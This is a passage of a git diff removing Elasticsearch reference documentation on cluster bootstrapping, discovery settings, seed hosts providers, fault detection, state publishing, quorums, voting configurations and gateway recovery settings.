-nodes, master-eligible nodes joining an existing cluster, or cluster restarts. - -It is technically sufficient to set `cluster.initial_master_nodes` on a single -master-eligible node in the cluster, and only to mention that single node in the -setting's value, but this provides no fault tolerance before the cluster has -fully formed. It is therefore better to bootstrap using at least three -master-eligible nodes, each with a `cluster.initial_master_nodes` setting -containing all three nodes. - -WARNING: You must set `cluster.initial_master_nodes` to the same list of nodes -on each node on which it is set in order to be sure that only a single cluster -forms during bootstrapping and therefore to avoid the risk of data loss. - -For a cluster with 3 master-eligible nodes (with <> -`master-a`, `master-b` and `master-c`) the configuration will look as follows: - -[source,yaml] --------------------------------------------------- -cluster.initial_master_nodes: - - master-a - - master-b - - master-c --------------------------------------------------- - -Like all node settings, it is also possible to specify the initial set of master -nodes on the command-line that is used to start Elasticsearch: - -[source,bash] --------------------------------------------------- -$ bin/elasticsearch -Ecluster.initial_master_nodes=master-a,master-b,master-c --------------------------------------------------- - -[NOTE] -================================================== - -[[modules-discovery-bootstrap-cluster-fqdns]] The node names used in the -`cluster.initial_master_nodes` list must exactly match the `node.name` -properties of the nodes. By default the node name is set to the machine's -hostname which may or may not be fully-qualified depending on your system -configuration. If each node name is a fully-qualified domain name such as -`master-a.example.com` then you must use fully-qualified domain names in the -`cluster.initial_master_nodes` list too; conversely if your node names are bare -hostnames (without the `.example.com` suffix) then you must use bare hostnames -in the `cluster.initial_master_nodes` list. If you use a mix of fully-qualifed -and bare hostnames, or there is some other mismatch between `node.name` and -`cluster.initial_master_nodes`, then the cluster will not form successfully and -you will see log messages like the following. - -[source,text] --------------------------------------------------- -[master-a.example.com] master not discovered yet, this node has -not previously joined a bootstrapped (v7+) cluster, and this -node must discover master-eligible nodes [master-a, master-b] to -bootstrap a cluster: have discovered [{master-b.example.com}{... --------------------------------------------------- - -This message shows the node names `master-a.example.com` and -`master-b.example.com` as well as the `cluster.initial_master_nodes` entries -`master-a` and `master-b`, and it is clear from this message that they do not -match exactly. - -================================================== - -[discrete] -==== Choosing a cluster name - -The <> setting enables you to create multiple -clusters which are separated from each other. Nodes verify that they agree on -their cluster name when they first connect to each other, and Elasticsearch -will only form a cluster from nodes that all have the same cluster name. The -default value for the cluster name is `elasticsearch`, but it is recommended to -change this to reflect the logical name of the cluster. - -[discrete] -==== Auto-bootstrapping in development mode - -If the cluster is running with a completely default configuration then it will -automatically bootstrap a cluster based on the nodes that could be discovered to -be running on the same host within a short time after startup. This means that -by default it is possible to start up several nodes on a single machine and have -them automatically form a cluster which is very useful for development -environments and experimentation. However, since nodes may not always -successfully discover each other quickly enough this automatic bootstrapping -cannot be relied upon and cannot be used in production deployments. - -If any of the following settings are configured then auto-bootstrapping will not -take place, and you must configure `cluster.initial_master_nodes` as described -in the <>: - -* `discovery.seed_providers` -* `discovery.seed_hosts` -* `cluster.initial_master_nodes` - -[NOTE] -================================================== - -[[modules-discovery-bootstrap-cluster-joining]] If you start an {es} node -without configuring these settings then it will start up in development mode and -auto-bootstrap itself into a new cluster. If you start some {es} nodes on -different hosts then by default they will not discover each other and will form -a different cluster on each host. {es} will not merge separate clusters together -after they have formed, even if you subsequently try and configure all the nodes -into a single cluster. This is because there is no way to merge these separate -clusters together without a risk of data loss. You can tell that you have formed -separate clusters by checking the cluster UUID reported by `GET /` on each node. -If you intended to form a single cluster then you should start again: - -* Shut down all the nodes. -* Completely wipe each node by deleting the contents of their - <>. -* Configure `cluster.initial_master_nodes` as described above. -* Restart all the nodes and verify that they have formed a single cluster. - -================================================== diff --git a/docs/reference/modules/discovery/discovery-settings.asciidoc b/docs/reference/modules/discovery/discovery-settings.asciidoc deleted file mode 100644 index 7659262db5e..00000000000 --- a/docs/reference/modules/discovery/discovery-settings.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[[modules-discovery-settings]] -=== Discovery and cluster formation settings - -<> are affected by the -following settings: - -`discovery.seed_hosts`:: -+ --- -(<>) -Provides a list of the addresses of the master-eligible nodes in the cluster. -May also be a single string containing the addresses separated by commas. Each -address has the format `host:port` or `host`. The `host` is either a host name -to be resolved by DNS, an IPv4 address, or an IPv6 address. IPv6 addresses -must be enclosed in square brackets. If a host name resolves via DNS to multiple -addresses, {es} uses all of them. DNS lookups are subject to -<>. If the `port` is not given then it -is determined by checking the following settings in order: - -. `transport.profiles.default.port` -. `transport.port` - -If neither of these is set then the default port is `9300`. The default value -for `discovery.seed_hosts` is `["127.0.0.1", "[::1]"]`. See <>. - -This setting was previously known as `discovery.zen.ping.unicast.hosts`. Its -old name is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future version. --- - -`discovery.seed_providers`:: -(<>) -Specifies which types of <> to -use to obtain the addresses of the seed nodes used to start the discovery -process. By default, it is the -<> which -obtains the seed node addresses from the `discovery.seed_hosts` setting. -This setting was previously known as `discovery.zen.hosts_provider`. Its old -name is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future version. - -`discovery.type`:: -(<>) -Specifies whether {es} should form a multiple-node cluster. By default, {es} -discovers other nodes when forming a cluster and allows other nodes to join -the cluster later. If `discovery.type` is set to `single-node`, {es} forms a -single-node cluster and suppresses the timeout set by -`cluster.publish.timeout`. For more information about when you might use -this setting, see <>. - -`cluster.initial_master_nodes`:: -(<>) -Sets the initial set of master-eligible nodes in a brand-new cluster. By default -this list is empty, meaning that this node expects to join a cluster that has -already been bootstrapped. See <>. - -[discrete] -==== Expert settings - -Discovery and cluster formation are also affected by the following -_expert-level_ settings, although it is not recommended to change any of these -from their default values. - -WARNING: If you adjust these settings then your cluster may not form correctly -or may become unstable or intolerant of certain failures. - -`discovery.cluster_formation_warning_timeout`:: -(<>) -Sets how long a node will try to form a cluster before logging a warning that -the cluster did not form. Defaults to `10s`. If a cluster has not formed after -`discovery.cluster_formation_warning_timeout` has elapsed then the node will log -a warning message that starts with the phrase `master not discovered` which -describes the current state of the discovery process. - -`discovery.find_peers_interval`:: -(<>) -Sets how long a node will wait before attempting another discovery round. -Defaults to `1s`. - -`discovery.probe.connect_timeout`:: -(<>) -Sets how long to wait when attempting to connect to each address. Defaults to -`3s`. - -`discovery.probe.handshake_timeout`:: -(<>) -Sets how long to wait when attempting to identify the remote node via a -handshake. Defaults to `1s`. - -`discovery.request_peers_timeout`:: -(<>) -Sets how long a node will wait after asking its peers again before considering -the request to have failed. Defaults to `3s`. - -`discovery.seed_resolver.max_concurrent_resolvers`:: -(<>) -Specifies how many concurrent DNS lookups to perform when resolving the -addresses of seed nodes. Defaults to `10`. This setting was previously -known as `discovery.zen.ping.unicast.concurrent_connects`. Its old name is -deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future -version. - -`discovery.seed_resolver.timeout`:: -(<>) -Specifies how long to wait for each DNS lookup performed when resolving the -addresses of seed nodes. Defaults to `5s`. This setting was previously -known as `discovery.zen.ping.unicast.hosts.resolve_timeout`. Its old name -is deprecated but continues to work in order to preserve backwards -compatibility. Support for the old name will be removed in a future -version. - -`cluster.auto_shrink_voting_configuration`:: -(<>) -Controls whether the <> sheds -departed nodes automatically, as long as it still contains at least 3 nodes. The -default value is `true`. If set to `false`, the voting configuration never -shrinks automatically and you must remove departed nodes manually with the -<>. - -[[master-election-settings]]`cluster.election.back_off_time`:: -(<>) -Sets the amount to increase the upper bound on the wait before an election on -each election failure. Note that this is _linear_ backoff. This defaults to -`100ms`. Changing this setting from the default may cause your cluster to fail -to elect a master node. - -`cluster.election.duration`:: -(<>) -Sets how long each election is allowed to take before a node considers it to -have failed and schedules a retry. This defaults to `500ms`. Changing this -setting from the default may cause your cluster to fail to elect a master node. - -`cluster.election.initial_timeout`:: -(<>) -Sets the upper bound on how long a node will wait initially, or after the -elected master fails, before attempting its first election. This defaults to -`100ms`. Changing this setting from the default may cause your cluster to fail -to elect a master node. - -`cluster.election.max_timeout`:: -(<>) -Sets the maximum upper bound on how long a node will wait before attempting an -first election, so that an network partition that lasts for a long time does not -result in excessively sparse elections. This defaults to `10s`. Changing this -setting from the default may cause your cluster to fail to elect a master node. - -[[fault-detection-settings]]`cluster.fault_detection.follower_check.interval`:: -(<>) -Sets how long the elected master waits between follower checks to each other -node in the cluster. Defaults to `1s`. Changing this setting from the default -may cause your cluster to become unstable. - -`cluster.fault_detection.follower_check.timeout`:: -(<>) -Sets how long the elected master waits for a response to a follower check before -considering it to have failed. Defaults to `10s`. Changing this setting from the -default may cause your cluster to become unstable. - -`cluster.fault_detection.follower_check.retry_count`:: -(<>) -Sets how many consecutive follower check failures must occur to each node before -the elected master considers that node to be faulty and removes it from the -cluster. Defaults to `3`. Changing this setting from the default may cause your -cluster to become unstable. - -`cluster.fault_detection.leader_check.interval`:: -(<>) -Sets how long each node waits between checks of the elected master. Defaults to -`1s`. Changing this setting from the default may cause your cluster to become -unstable. - -`cluster.fault_detection.leader_check.timeout`:: -(<>) -Sets how long each node waits for a response to a leader check from the elected -master before considering it to have failed. Defaults to `10s`. Changing this -setting from the default may cause your cluster to become unstable. - -`cluster.fault_detection.leader_check.retry_count`:: -(<>) -Sets how many consecutive leader check failures must occur before a node -considers the elected master to be faulty and attempts to find or elect a new -master. Defaults to `3`. Changing this setting from the default may cause your -cluster to become unstable. - -`cluster.follower_lag.timeout`:: -(<>) -Sets how long the master node waits to receive acknowledgements for cluster -state updates from lagging nodes. The default value is `90s`. If a node does not -successfully apply the cluster state update within this period of time, it is -considered to have failed and is removed from the cluster. See -<>. - -`cluster.join.timeout`:: -(<>) -deprecated[7.10, Has no effect in 7.x clusters] Sets how long a node will -wait after sending a request to join a version 6.8 master before it -considers the request to have failed and retries. Defaults to `60s`. - -`cluster.max_voting_config_exclusions`:: -(<>) -Sets a limit on the number of voting configuration exclusions at any one time. -The default value is `10`. See <>. - -`cluster.publish.info_timeout`:: -(<>) -Sets how long the master node waits for each cluster state update to be -completely published to all nodes before logging a message indicating that some -nodes are responding slowly. The default value is `10s`. - -`cluster.publish.timeout`:: -(<>) -Sets how long the master node waits for each cluster state update to be -completely published to all nodes, unless `discovery.type` is set to -`single-node`. The default value is `30s`. See <>. - -[[no-master-block]] -`cluster.no_master_block`:: -(<>) -Specifies which operations are rejected when there is no active master in a -cluster. This setting has three valid values: -+ --- -`all`::: All operations on the node (both read and write operations) are rejected. -This also applies for API cluster state read or write operations, like the get -index settings, put mapping and cluster state API. - -`write`::: (default) Write operations are rejected. Read operations succeed, -based on the last known cluster configuration. This situation may result in -partial reads of stale data as this node may be isolated from the rest of the -cluster. - -`metadata_write`::: Only metadata write operations (e.g. mapping updates, -routing table changes) are rejected but regular indexing operations continue -to work. Read and write operations succeed, based on the last known cluster -configuration. This situation may result in partial reads of stale data as -this node may be isolated from the rest of the cluster. - -[NOTE] -=============================== -* The `cluster.no_master_block` setting doesn't apply to nodes-based APIs -(for example, cluster stats, node info, and node stats APIs). Requests to these -APIs are not be blocked and can run on any available node. - -* For the cluster to be fully operational, it must have an active master. -=============================== - -WARNING: This setting replaces the `discovery.zen.no_master_block` setting in -earlier versions. The `discovery.zen.no_master_block` setting is ignored. - --- - -`monitor.fs.health.enabled`:: -(<>) -If `true`, the node runs periodic -<>. Defaults -to `true`. - -`monitor.fs.health.refresh_interval`:: -(<>) -Interval between successive -<>. Defaults -to `2m`. - -`monitor.fs.health.slow_path_logging_threshold`:: -(<>) -If a <> -takes longer than this threshold then {es} logs a warning. Defaults to `5s`. diff --git a/docs/reference/modules/discovery/discovery.asciidoc b/docs/reference/modules/discovery/discovery.asciidoc deleted file mode 100644 index 0c5057486de..00000000000 --- a/docs/reference/modules/discovery/discovery.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[modules-discovery-hosts-providers]] -=== Discovery - -Discovery is the process by which the cluster formation module finds other -nodes with which to form a cluster. This process runs when you start an -Elasticsearch node or when a node believes the master node failed and continues -until the master node is found or a new master node is elected. - -This process starts with a list of _seed_ addresses from one or more -<>, together with the addresses -of any master-eligible nodes that were in the last-known cluster. The process -operates in two phases: First, each node probes the seed addresses by -connecting to each address and attempting to identify the node to which it is -connected and to verify that it is master-eligible. Secondly, if successful, it -shares with the remote node a list of all of its known master-eligible peers -and the remote node responds with _its_ peers in turn. The node then probes all -the new nodes that it just discovered, requests their peers, and so on. - -If the node is not master-eligible then it continues this discovery process -until it has discovered an elected master node. If no elected master is -discovered then the node will retry after `discovery.find_peers_interval` which -defaults to `1s`. - -If the node is master-eligible then it continues this discovery process until -it has either discovered an elected master node or else it has discovered -enough masterless master-eligible nodes to complete an election. If neither of -these occur quickly enough then the node will retry after -`discovery.find_peers_interval` which defaults to `1s`. - -[[built-in-hosts-providers]] -==== Seed hosts providers - -By default the cluster formation module offers two seed hosts providers to -configure the list of seed nodes: a _settings_-based and a _file_-based seed -hosts provider. It can be extended to support cloud environments and other -forms of seed hosts providers via {plugins}/discovery.html[discovery plugins]. -Seed hosts providers are configured using the `discovery.seed_providers` -setting, which defaults to the _settings_-based hosts provider. This setting -accepts a list of different providers, allowing you to make use of multiple -ways to find the seed hosts for your cluster. - -Each seed hosts provider yields the IP addresses or hostnames of the seed -nodes. If it returns any hostnames then these are resolved to IP addresses -using a DNS lookup. If a hostname resolves to multiple IP addresses then {es} -tries to find a seed node at all of these addresses. If the hosts provider does -not explicitly give the TCP port of the node by then, it will implicitly use the -first port in the port range given by `transport.profiles.default.port`, or by -`transport.port` if `transport.profiles.default.port` is not set. The number of -concurrent lookups is controlled by -`discovery.seed_resolver.max_concurrent_resolvers` which defaults to `10`, and -the timeout for each lookup is controlled by `discovery.seed_resolver.timeout` -which defaults to `5s`. Note that DNS lookups are subject to -<>. - -[discrete] -[[settings-based-hosts-provider]] -===== Settings-based seed hosts provider - -The settings-based seed hosts provider uses a node setting to configure a -static list of the addresses of the seed nodes. These addresses can be given as -hostnames or IP addresses; hosts specified as hostnames are resolved to IP -addresses during each round of discovery. - -The list of hosts is set using the <> -static setting. For example: - -[source,yaml] --------------------------------------------------- -discovery.seed_hosts: - - 192.168.1.10:9300 - - 192.168.1.11 <1> - - seeds.mydomain.com <2> --------------------------------------------------- -<1> The port will default to `transport.profiles.default.port` and fallback to - `transport.port` if not specified. -<2> If a hostname resolves to multiple IP addresses, {es} will attempt to - connect to every resolved address. - -[discrete] -[[file-based-hosts-provider]] -===== File-based seed hosts provider - -The file-based seed hosts provider configures a list of hosts via an external -file. {es} reloads this file when it changes, so that the list of seed nodes -can change dynamically without needing to restart each node. For example, this -gives a convenient mechanism for an {es} instance that is run in a Docker -container to be dynamically supplied with a list of IP addresses to connect to -when those IP addresses may not be known at node startup. - -To enable file-based discovery, configure the `file` hosts provider as follows -in the `elasticsearch.yml` file: - -[source,yml] ----------------------------------------------------------------- -discovery.seed_providers: file ----------------------------------------------------------------- - -Then create a file at `$ES_PATH_CONF/unicast_hosts.txt` in the format described -below. Any time a change is made to the `unicast_hosts.txt` file the new -changes will be picked up by {es} and the new hosts list will be used. - -Note that the file-based discovery plugin augments the unicast hosts list in -`elasticsearch.yml`: if there are valid seed addresses in -`discovery.seed_hosts` then {es} uses those addresses in addition to those -supplied in `unicast_hosts.txt`. - -The `unicast_hosts.txt` file contains one node entry per line. Each node entry -consists of the host (host name or IP address) and an optional transport port -number. If the port number is specified, is must come immediately after the -host (on the same line) separated by a `:`. If the port number is not -specified, {es} will implicitly use the first port in the port range given by -`transport.profiles.default.port`, or by `transport.port` if -`transport.profiles.default.port` is not set. - -For example, this is an example of `unicast_hosts.txt` for a cluster with four -nodes that participate in discovery, some of which are not running on the -default port: - -[source,txt] ----------------------------------------------------------------- -10.10.10.5 -10.10.10.6:9305 -10.10.10.5:10005 -# an IPv6 address -[2001:0db8:85a3:0000:0000:8a2e:0370:7334]:9301 ----------------------------------------------------------------- - -Host names are allowed instead of IP addresses and are resolved by DNS as -described above. IPv6 addresses must be given in brackets with the port, if -needed, coming after the brackets. - -You can also add comments to this file. All comments must appear on their lines -starting with `#` (i.e. comments cannot start in the middle of a line). - -[discrete] -[[ec2-hosts-provider]] -===== EC2 hosts provider - -The {plugins}/discovery-ec2.html[EC2 discovery plugin] adds a hosts provider -that uses the https://github.com/aws/aws-sdk-java[AWS API] to find a list of -seed nodes. - -[discrete] -[[azure-classic-hosts-provider]] -===== Azure Classic hosts provider - -The {plugins}/discovery-azure-classic.html[Azure Classic discovery plugin] adds -a hosts provider that uses the Azure Classic API find a list of seed nodes. - -[discrete] -[[gce-hosts-provider]] -===== Google Compute Engine hosts provider - -The {plugins}/discovery-gce.html[GCE discovery plugin] adds a hosts provider -that uses the GCE API find a list of seed nodes. diff --git a/docs/reference/modules/discovery/fault-detection.asciidoc b/docs/reference/modules/discovery/fault-detection.asciidoc deleted file mode 100644 index 56b5bc32a75..00000000000 --- a/docs/reference/modules/discovery/fault-detection.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[cluster-fault-detection]] -=== Cluster fault detection - -The elected master periodically checks each of the nodes in the cluster to -ensure that they are still connected and healthy. Each node in the cluster also -periodically checks the health of the elected master. These checks are known -respectively as _follower checks_ and _leader checks_. - -Elasticsearch allows these checks to occasionally fail or timeout without -taking any action. It considers a node to be faulty only after a number of -consecutive checks have failed. You can control fault detection behavior with -<>. - -If the elected master detects that a node has disconnected, however, this -situation is treated as an immediate failure. The master bypasses the timeout -and retry setting values and attempts to remove the node from the cluster. -Similarly, if a node detects that the elected master has disconnected, this -situation is treated as an immediate failure. The node bypasses the timeout and -retry settings and restarts its discovery phase to try and find or elect a new -master. - -[[cluster-fault-detection-filesystem-health]] -Additionally, each node periodically verifies that its data path is healthy by -writing a small file to disk and then deleting it again. If a node discovers -its data path is unhealthy then it is removed from the cluster until the data -path recovers. You can control this behavior with the -<>. diff --git a/docs/reference/modules/discovery/publishing.asciidoc b/docs/reference/modules/discovery/publishing.asciidoc deleted file mode 100644 index 8452f0cd04f..00000000000 --- a/docs/reference/modules/discovery/publishing.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[cluster-state-publishing]] -=== Publishing the cluster state - -The master node is the only node in a cluster that can make changes to the -cluster state. The master node processes one batch of cluster state updates at -a time, computing the required changes and publishing the updated cluster state -to all the other nodes in the cluster. Each publication starts with the master -broadcasting the updated cluster state to all nodes in the cluster. Each node -responds with an acknowledgement but does not yet apply the newly-received -state. Once the master has collected acknowledgements from enough -master-eligible nodes, the new cluster state is said to be _committed_ and the -master broadcasts another message instructing nodes to apply the now-committed -state. Each node receives this message, applies the updated state, and then -sends a second acknowledgement back to the master. - -The master allows a limited amount of time for each cluster state update to be -completely published to all nodes. It is defined by the -`cluster.publish.timeout` setting, which defaults to `30s`, measured from the -time the publication started. If this time is reached before the new cluster -state is committed then the cluster state change is rejected and the master -considers itself to have failed. It stands down and starts trying to elect a -new master. - -If the new cluster state is committed before `cluster.publish.timeout` has -elapsed, the master node considers the change to have succeeded. It waits until -the timeout has elapsed or until it has received acknowledgements that each -node in the cluster has applied the updated state, and then starts processing -and publishing the next cluster state update. If some acknowledgements have not -been received (i.e. some nodes have not yet confirmed that they have applied -the current update), these nodes are said to be _lagging_ since their cluster -states have fallen behind the master's latest state. The master waits for the -lagging nodes to catch up for a further time, `cluster.follower_lag.timeout`, -which defaults to `90s`. If a node has still not successfully applied the -cluster state update within this time then it is considered to have failed and -is removed from the cluster. - -Cluster state updates are typically published as diffs to the previous cluster -state, which reduces the time and network bandwidth needed to publish a cluster -state update. For example, when updating the mappings for only a subset of the -indices in the cluster state, only the updates for those indices need to be -published to the nodes in the cluster, as long as those nodes have the previous -cluster state. If a node is missing the previous cluster state, for example -when rejoining a cluster, the master will publish the full cluster state to -that node so that it can receive future updates as diffs. - -NOTE: {es} is a peer to peer based system, in which nodes communicate with one -another directly. The high-throughput APIs (index, delete, search) do not -normally interact with the master node. The responsibility of the master node -is to maintain the global cluster state and reassign shards when nodes join or -leave the cluster. Each time the cluster state is changed, the new state is -published to all nodes in the cluster as described above. diff --git a/docs/reference/modules/discovery/quorums.asciidoc b/docs/reference/modules/discovery/quorums.asciidoc deleted file mode 100644 index 5cf9438544c..00000000000 --- a/docs/reference/modules/discovery/quorums.asciidoc +++ /dev/null @@ -1,66 +0,0 @@ -[[modules-discovery-quorums]] -=== Quorum-based decision making - -Electing a master node and changing the cluster state are the two fundamental -tasks that master-eligible nodes must work together to perform. It is important -that these activities work robustly even if some nodes have failed. -Elasticsearch achieves this robustness by considering each action to have -succeeded on receipt of responses from a _quorum_, which is a subset of the -master-eligible nodes in the cluster. The advantage of requiring only a subset -of the nodes to respond is that it means some of the nodes can fail without -preventing the cluster from making progress. The quorums are carefully chosen so -the cluster does not have a "split brain" scenario where it's partitioned into -two pieces such that each piece may make decisions that are inconsistent with -those of the other piece. - -Elasticsearch allows you to add and remove master-eligible nodes to a running -cluster. In many cases you can do this simply by starting or stopping the nodes -as required. See <>. - -As nodes are added or removed Elasticsearch maintains an optimal level of fault -tolerance by updating the cluster's <>, which is the set of master-eligible nodes whose responses are -counted when making decisions such as electing a new master or committing a new -cluster state. A decision is made only after more than half of the nodes in the -voting configuration have responded. Usually the voting configuration is the -same as the set of all the master-eligible nodes that are currently in the -cluster. However, there are some situations in which they may be different. - -To be sure that the cluster remains available you **must not stop half or more -of the nodes in the voting configuration at the same time**. As long as more -than half of the voting nodes are available the cluster can still work normally. -This means that if there are three or four master-eligible nodes, the cluster -can tolerate one of them being unavailable. If there are two or fewer -master-eligible nodes, they must all remain available. - -After a node has joined or left the cluster the elected master must issue a -cluster-state update that adjusts the voting configuration to match, and this -can take a short time to complete. It is important to wait for this adjustment -to complete before removing more nodes from the cluster. - -[discrete] -==== Master elections - -Elasticsearch uses an election process to agree on an elected master node, both -at startup and if the existing elected master fails. Any master-eligible node -can start an election, and normally the first election that takes place will -succeed. Elections only usually fail when two nodes both happen to start their -elections at about the same time, so elections are scheduled randomly on each -node to reduce the probability of this happening. Nodes will retry elections -until a master is elected, backing off on failure, so that eventually an -election will succeed (with arbitrarily high probability). The scheduling of -master elections are controlled by the <>. - -[discrete] -==== Cluster maintenance, rolling restarts and migrations - -Many cluster maintenance tasks involve temporarily shutting down one or more -nodes and then starting them back up again. By default Elasticsearch can remain -available if one of its master-eligible nodes is taken offline, such as during a -<>. Furthermore, if multiple nodes are stopped -and then started again then it will automatically recover, such as during a -<>. There is no need to take any further -action with the APIs described here in these cases, because the set of master -nodes is not changing permanently. - diff --git a/docs/reference/modules/discovery/voting.asciidoc b/docs/reference/modules/discovery/voting.asciidoc deleted file mode 100644 index 8a318591ce0..00000000000 --- a/docs/reference/modules/discovery/voting.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[modules-discovery-voting]] -=== Voting configurations - -Each {es} cluster has a _voting configuration_, which is the set of -<> whose responses are counted when making -decisions such as electing a new master or committing a new cluster state. -Decisions are made only after a majority (more than half) of the nodes in the -voting configuration respond. - -Usually the voting configuration is the same as the set of all the -master-eligible nodes that are currently in the cluster. However, there are some -situations in which they may be different. - -IMPORTANT: To ensure the cluster remains available, you **must not stop half or -more of the nodes in the voting configuration at the same time**. As long as more -than half of the voting nodes are available, the cluster can work normally. For -example, if there are three or four master-eligible nodes, the cluster -can tolerate one unavailable node. If there are two or fewer master-eligible -nodes, they must all remain available. - -After a node joins or leaves the cluster, {es} reacts by automatically making -corresponding changes to the voting configuration in order to ensure that the -cluster is as resilient as possible. It is important to wait for this adjustment -to complete before you remove more nodes from the cluster. For more information, -see <>. - -The current voting configuration is stored in the cluster state so you can -inspect its current contents as follows: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=metadata.cluster_coordination.last_committed_config --------------------------------------------------- - -NOTE: The current voting configuration is not necessarily the same as the set of -all available master-eligible nodes in the cluster. Altering the voting -configuration involves taking a vote, so it takes some time to adjust the -configuration as nodes join or leave the cluster. Also, there are situations -where the most resilient configuration includes unavailable nodes or does not -include some available nodes. In these situations, the voting configuration -differs from the set of available master-eligible nodes in the cluster. - -Larger voting configurations are usually more resilient, so Elasticsearch -normally prefers to add master-eligible nodes to the voting configuration after -they join the cluster. Similarly, if a node in the voting configuration -leaves the cluster and there is another master-eligible node in the cluster that -is not in the voting configuration then it is preferable to swap these two nodes -over. The size of the voting configuration is thus unchanged but its -resilience increases. - -It is not so straightforward to automatically remove nodes from the voting -configuration after they have left the cluster. Different strategies have -different benefits and drawbacks, so the right choice depends on how the cluster -will be used. You can control whether the voting configuration automatically -shrinks by using the -<>. - -NOTE: If `cluster.auto_shrink_voting_configuration` is set to `true` (which is -the default and recommended value) and there are at least three master-eligible -nodes in the cluster, Elasticsearch remains capable of processing cluster state -updates as long as all but one of its master-eligible nodes are healthy. - -There are situations in which Elasticsearch might tolerate the loss of multiple -nodes, but this is not guaranteed under all sequences of failures. If the -`cluster.auto_shrink_voting_configuration` setting is `false`, you must remove -departed nodes from the voting configuration manually. Use the -<> to achieve the desired level -of resilience. - -No matter how it is configured, Elasticsearch will not suffer from a -"split-brain" inconsistency. The `cluster.auto_shrink_voting_configuration` -setting affects only its availability in the event of the failure of some of its -nodes and the administrative tasks that must be performed as nodes join and -leave the cluster. - -[discrete] -==== Even numbers of master-eligible nodes - -There should normally be an odd number of master-eligible nodes in a cluster. -If there is an even number, Elasticsearch leaves one of them out of the voting -configuration to ensure that it has an odd size. This omission does not decrease -the failure-tolerance of the cluster. In fact, improves it slightly: if the -cluster suffers from a network partition that divides it into two equally-sized -halves then one of the halves will contain a majority of the voting -configuration and will be able to keep operating. If all of the votes from -master-eligible nodes were counted, neither side would contain a strict majority -of the nodes and so the cluster would not be able to make any progress. - -For instance if there are four master-eligible nodes in the cluster and the -voting configuration contained all of them, any quorum-based decision would -require votes from at least three of them. This situation means that the cluster -can tolerate the loss of only a single master-eligible node. If this cluster -were split into two equal halves, neither half would contain three -master-eligible nodes and the cluster would not be able to make any progress. -If the voting configuration contains only three of the four master-eligible -nodes, however, the cluster is still only fully tolerant to the loss of one -node, but quorum-based decisions require votes from two of the three voting -nodes. In the event of an even split, one half will contain two of the three -voting nodes so that half will remain available. - -[discrete] -==== Setting the initial voting configuration - -When a brand-new cluster starts up for the first time, it must elect its first -master node. To do this election, it needs to know the set of master-eligible -nodes whose votes should count. This initial voting configuration is known as -the _bootstrap configuration_ and is set in the -<>. - -It is important that the bootstrap configuration identifies exactly which nodes -should vote in the first election. It is not sufficient to configure each node -with an expectation of how many nodes there should be in the cluster. It is also -important to note that the bootstrap configuration must come from outside the -cluster: there is no safe way for the cluster to determine the bootstrap -configuration correctly on its own. - -If the bootstrap configuration is not set correctly, when you start a brand-new -cluster there is a risk that you will accidentally form two separate clusters -instead of one. This situation can lead to data loss: you might start using both -clusters before you notice that anything has gone wrong and it is impossible to -merge them together later. - -NOTE: To illustrate the problem with configuring each node to expect a certain -cluster size, imagine starting up a three-node cluster in which each node knows -that it is going to be part of a three-node cluster. A majority of three nodes -is two, so normally the first two nodes to discover each other form a cluster -and the third node joins them a short time later. However, imagine that four -nodes were erroneously started instead of three. In this case, there are enough -nodes to form two separate clusters. Of course if each node is started manually -then it's unlikely that too many nodes are started. If you're using an automated -orchestrator, however, it's certainly possible to get into this situation-- -particularly if the orchestrator is not resilient to failures such as network -partitions. - -The initial quorum is only required the very first time a whole cluster starts -up. New nodes joining an established cluster can safely obtain all the -information they need from the elected master. Nodes that have previously been -part of a cluster will have stored to disk all the information that is required -when they restart. diff --git a/docs/reference/modules/gateway.asciidoc b/docs/reference/modules/gateway.asciidoc deleted file mode 100644 index 0558243f22c..00000000000 --- a/docs/reference/modules/gateway.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[modules-gateway]] -=== Local gateway settings - -The local gateway stores the cluster state and shard data across full -cluster restarts. - -The following _static_ settings, which must be set on every master node, -control how long a freshly elected master should wait before it tries to -recover the cluster state and the cluster's data. - -NOTE: These settings only take effect on a full cluster restart. - -`gateway.expected_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.expected_data_nodes` instead.] -Number of data or master nodes expected in the cluster. -Recovery of local shards begins when the expected number of -nodes join the cluster. Defaults to `0`. - -`gateway.expected_master_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.expected_data_nodes` instead.] -Number of master nodes expected in the cluster. -Recovery of local shards begins when the expected number of -master nodes join the cluster. Defaults to `0`. - -`gateway.expected_data_nodes`:: -(<>) -Number of data nodes expected in the cluster. -Recovery of local shards begins when the expected number of -data nodes join the cluster. Defaults to `0`. - -`gateway.recover_after_time`:: -(<>) -If the expected number of nodes is not achieved, the recovery process waits -for the configured amount of time before trying to recover. -Defaults to `5m` if one of the `expected_nodes` settings is configured. -+ -Once the `recover_after_time` duration has timed out, recovery will start -as long as the following conditions are met: - -`gateway.recover_after_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.recover_after_data_nodes` instead.] -Recover as long as this many data or master nodes have joined the cluster. - -`gateway.recover_after_master_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.recover_after_data_nodes` instead.] -Recover as long as this many master nodes have joined the cluster. - -`gateway.recover_after_data_nodes`:: -(<>) -Recover as long as this many data nodes have joined the cluster. - -[[dangling-indices]] -==== Dangling indices - -When a node joins the cluster, if it finds any shards stored in its local data -directory that do not already exist in the cluster, it will consider those -shards to be "dangling". Importing dangling indices -into the cluster using `gateway.auto_import_dangling_indices` is not safe. -Instead, use the <>. Neither -mechanism provides any guarantees as to whether the imported data truly -represents the latest state of the data when the index was still part of -the cluster. - -`gateway.auto_import_dangling_indices`:: - - deprecated:[7.9.0, This setting will be removed in 8.0. You should use the dedicated dangling indices API instead.] - Whether to automatically import dangling indices into the cluster - state, provided no indices already exist with the same name. Defaults - to `false`. - -WARNING: The auto-import functionality was intended as a best effort to help users -who lose all master 